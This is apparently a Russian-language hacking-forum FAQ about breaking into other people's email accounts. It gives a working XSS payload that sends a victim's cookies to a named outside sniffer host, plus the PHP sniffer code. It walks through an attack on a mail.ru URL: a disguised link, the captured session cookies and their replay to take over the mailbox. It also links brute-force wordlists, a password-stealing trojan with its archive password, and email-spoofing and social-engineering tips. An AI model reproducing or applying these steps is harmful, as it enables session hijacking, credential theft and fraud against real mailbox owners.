1) XSS - Cross Site Scripting (межсайтовое выполнение сценариев). Чаще всего используется для получения cookies и/или идентификатора сессии (обычно идентификатор сессии виден в url).. 2) Cookie - http://antichat.ru/txt/old/cookie.shtml 3) В почтовых системах используются различные фильтры на управляющие символы, что затрудняет выполнение xss, как их обходить написано здесь : http://antichat.ru/crackchat/HTML/ 4) На снифер обычно передаются значения полученные с помощью xss. Про него написано тут : http://antichat.ru/sniff/ 5) С помощью подделки cookies можно попасть в чужой ящик, для этого можно пользоваться программами Cookie Editor,minibrowser, inetcrack, IE_XSS_Kit 6) Примеры тут : http://antichat.ru/txt/hmail/
Граждане, смотрите что у нас теперь есть! Программка от LittleLamer для тестирования ВЕБ-Интерфейсов электронной почты на подверженность XSS-атакам. Программа представляет из себя smtp-клиент, которая отсылает на тестируемый адрес письмо в html-формате. В тело сообщения записаны всевозможные скриптовые выражения, они загружаются из конфигурационного файла. Во всех случаях, результат выполнения скрипта - алерт с порядковым номером строки, таким образом мы сразу видим, какие из выражений приводят к запуску скрипта в почте. Идея не нова, но LittleLamer реализвал её в виде одной удобной программы, скажем ему спасибо
Методы "вспоминания" пароля (от мыла) Хорошая статья, всем читать пержде чем задать вопрос. Автор : censored!
Так же небольшое Faq для новичков Брут:программа которая подбирает пароли по словарю (passlist) Одна из таких прог есть Brutus AET 2 (он может послужить не только для брута мыл)Скачать можно тут http://download.rublev-school.ru/dc...loadfile&filename=brutus-aet2.rar&directory=& Словари:файлы в которых находятса сами пароли скачать можно тут : http://www.mobilstar.ru/files/dict/ ftp://ftp.funet.fi/pub/unix/security/dictionaries/ http://www.phreak.com/html/wordlists.shtml http://tpircs.anarxi.st/passwd.txt http://www.acolytez.com/dict/ ftp://ftp.openwall.com/pub/wordlists/ ftp://ftp.ox.ac.uk/pub/wordlists/ ftp://coast.cs.purdue.edu/pub/dict/wordlists/ http://www.passwords.ru/dic.htm http://getfile.biz/15660 http://www.outpost9.com/files/WordLists.html ftp://ftp.cerias.purdue.edu/pub/dict/ http://www.insidepro.com/eng/download.shtml http://passwords.ru/dic.php Чем больше словарей тем лутше! 2.Троян +СИ : Существует спецыализированые программы для вытаскивание паролей от почты аси и другого ... Ети программы называютса почтовыми троянами Существуют много троянов таких типов ,самыми известными из них есть xinch и pinch Скачать pinch можно тут http://aqust1ck.narod.ru/downloads/pinches/pinch2.58.rar (пароль к архиву 132) Больше прочитать про pinch можно тут http://forum.antichat.ru/thread14387.html СИ-Соц инженерия ! С помощью ее вы должны войти в доверие человека (одним из лутших способов прикинутса особью противоположного пола) Еще есть вариант написать письмо не от своего e-mail(а например от [email protected]) и отослать жертве письмо тчто вышла новая версия какой нить проги для e-mail (тут уже работает фантазия) Удачного ВАМ ХАКА =) По всем вопросам пишите мне в ПМ!
Самый простой способ залезть в чужой почтовый ящик ( Реализация пассивных XSS ) : ( к прочтению тех у кого на форуме сообщений <= 1 ) I) ВведениеНесколько вводных моментов, для того чтоб понять что происходит: 1) XSS (Cross Site Scripting) - уязвимость веб-приложения которая позволяет вставить html код в страницу 2) Cookies ( http://old.antichat.ru/txt/old/cookie.shtml ) в них как правило содержится сессия - это информация по которой идёт идентификация пользователей ( иногда сессия содержится в URL ) 3) С помощью XSS можно перехватить сессию пользователя - мы вставляем в страничку код сткриптового языка (в данном случае это javascript), который выполняется в браузере жертвы. Делается это так : в переменной document.cookies содержаться соответственно cookies пользователя. Наш javascritp создаёт картинку с именем img и присваиваем атрибуту src ссылку http://mayor.jino-net.ru/sniffer.php?значения_cookies , после знака '?' идут cookies и при загрузки рисунка наш скрипт sniffer.php получит эти данные в параметре QERTY_STRING HTML: <script>img = new Image(); img.src= "http://mayor.jino-net.ru/sniffer.php?"+escape(document.cookie);</script> ( функция escape кодирует данные в юникод, это делается для того чтобы если в значения cookies встретиться какой-то управляющий символ, например - #, после него данные не отсекались. При использовании этой функции надо не забыть расшифровать куки пришедшие на сниффер (в php это функция urldecode() ) ) 4) Сниффер - скрипт, получающий данные от пользователя и записывающий их в файл. Вот самый простой пример сниффера написанного на php : PHP: <?php $fp=fopen("log.html","a+t"); fputs($fp," Время: ".date("[D d/m/Y H:i]")."<br> IP: ".$_SERVER['REMOTE_ADDR']."<br> Откуда: ".htmlentities($_SERVER['HTTP_REFERER'])."<br> Браузер: ".$_SERVER['HTTP_USER_AGENT']."<br> QUERY_STRING: ".$_SERVER['QUERY_STRING']."<br><br> "); fclose($fp); ?> Идеальным вариантом будет найти активную XSS ( это те которые посылаются в теле письма, т е скрипт выполняется при открытии письма ), находить такие XSS всё сложнее, а вот пассивных XSS хватает даже на очень популярных почтовых системах ( это такие XSS который требуют участие жертвы в их исполнение - жертва должна кликнуть по ссылке, html код вставляется в страницу через параметры передаваемые странице в URL ) Такие XSS находить очень просто: 1) Смотрим в каком домене устанавливаются cookies. Для этого регистрируем себе ящик на том сервере, где хотим найти XSS, и заходим в свой ящик через программку minibrowser ( скачать программку можно тут - http://mayor.narod.ru/minibrowser.rar ), открываем вкладку cookies и смотрим значение domain, вот в этом домене и в доменах младшего уровня мы и будем искать пассивную XSS 2) Вставляем в параметр ссылки , значение которого, как вам кажется, попадают на страницу, следующий код: HTML: "'><script>alert('XSS!')</script> и если вылезет алерт с текстом XSS! то мы нашли что искали -------------------------------------------------------------------------------------- II) Реализация пассивной XSS на примере mail.ru Итак мы нашли пассивную XSS HTML: http://map.mail.ru/rus/print.asp?gst=rus_mail&w=1&h=1&vis="'><script>alert()</script> Вставим туда наш скрипт который отправит cookies нам на сниффер, а для конспирации перекинем жертву на другую страничку, например на рисунок: HTML: http://map.mail.ru/rus/print.asp?gst=rus_mail&w=1&h=1&vis="'><script>img=new/**/Image();img.src="http://mayor.jino-net.ru/sniffer.php?"+document.cookie;location.href="http://images.cards.mail.ru/snovimgodom1.jpg"</script> Подсунуть жертве такую ссылку, так чтоб по ней перешли, сложно, поэтому идём на ShortUrl.ru и создаём редирект, вот он: http://surl.ru/snovimgodom1.jpg Посмотреть можно тут После того как жертва перешла по ссылке идём на наш снифер и там видим что-то вроде : Mpop=1158589439:5f414670775c567219050219091d001b030d004f6a5d5e465e070d051b00770b1f44544b5c5fd5001080f031659584743174345:[email protected]:; mrcu=808244948A287F383B4D0100007F; p=FjoAAMr3WwAA; MailUser=1; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAABAAAAAAAAAAAAAAELwgcA; p_sid=0271b370d2e915582646a6b5b1a667c3; c56=0rpHRQAAAABkawEAAAAA; c8=wxNBRQAAAAELigMAAAAAAQdUAgAAAAABB1gBAAAAAAEYTgEAAAAAASHUAgAAAAABIk8BAAAAAAEh1QEAAAAAARW6AQAAAAABBrACAAAAAAEG7AIAAAAA; Теперь нам нужно подделать cookies, для этого мы используем программку minibrowser Разбиваем cookies вот так , т е каждый параметр на своей строке и в конце точка с запятой Code: Mpop=1158589439:5f414670775c567219050219091d001b030d004f6a5d5e465e070d051b00770b1f44544b5c5fd5001080f031659584743174345:[email protected]:; mrcu=808244948A287F383B4D0100007F; p=FjoAAMr3WwAA; MailUser=1; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAABAAAAAAAAAAAAAAELwgcA; p_sid=0271b370d2e915582646a6b5b1a667c3; c56=0rpHRQAAAABkawEAAAAA; c8=wxNBRQAAAAELigMAAAAAAQdUAgAAAAABB1gBAAAAAAEYTgEAAAAAASHUAgAAAAABIk8BAAAAAAEh1QEAAAAAARW6AQAAAAABBrACAAAAAAEG7AIAAAAA; Открываем minibrowser и вставляем в поле URL http://mail.ru/ , нажимаем GET , заходим в свой ящик, затем во вкладку "Сookies" вместо того что там находиться, вставляем куки со сниффера и нажимаем GET и если сессия не привязана к ip (что встретишь не часто), то мы в чужом ящике. Сессия на mail.ru "живёт", несколько часов, так что проделывать это нужно сразу, после того как cookies пришли на сиффер Остается добавить, что большое количество пользователей ставить одинаковые пароли, как на почтовый ящик, так и на различные форумы, чаты и тд, с которых приходят подтверждения о регистрации с логином и паролем ...
Добовление к Faq Анонимная отправка писем. Достаточно распространенный вопрос на форуме ВОПРОС: Как отправить письмо от чужого имени(анонимно) и как отправлять письма в виде HTML? Ответ: Все это делаеться с помощью очень удобного сервиса http://shorturl.ru/mail/index.php или http://www.papierenkarton.nl/m/mail.php Темы про анонимную отправку писем: Анонимная отправка писем Анонимная почта. Html анонимная отправка почты